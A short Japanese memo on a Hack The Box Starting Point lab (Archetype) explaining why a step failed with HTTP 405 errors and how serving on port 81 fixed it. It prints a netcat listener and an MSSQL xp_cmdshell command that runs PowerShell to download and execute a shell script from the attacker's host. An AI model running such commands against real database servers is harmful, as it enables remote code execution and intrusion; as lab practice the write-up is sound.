Hack The Boxを最近やり始めたのですが、Starting Pointの一部箇所でエラーとなり
先に進むことができなかった原因と回避策をメモしています。
利用したのはPwnbox環境です。
参考
【Hack The Box】Starting Point(Archetype)
エラー発生個所
//python3がエラーになっているはず
kali@kali:~$ sudo python3 -m http.server 80
kali@kali:~$ sudo nc -lvnp 443
//ufwコマンドなかったです。なくても問題ありませんでした。
kali@kali:~$ sudo ufw allow from 10.10.10.27 proto tcp to any port 80,443
//問題の箇所
SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"¥
xp_cmdshellコマンドを何度実行してもHTTPレスポンス405エラーとなります。
原因は既に80番ポートで別のWEBサーバが立ち上がっており、そちらのWEBサーバで
リクエストを弾いてました。
回避策
kali@kali:~$ sudo python3 -m http.server 81
kali@kali:~$ sudo nc -lvnp 443
//81番ポートにアクセスするようにURLを書き換え
SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3:81/shell.ps1\");"¥
単純にhtto.serverを80番以外で立ち上げ、xp_cmdshellを少し書き換えるだけです。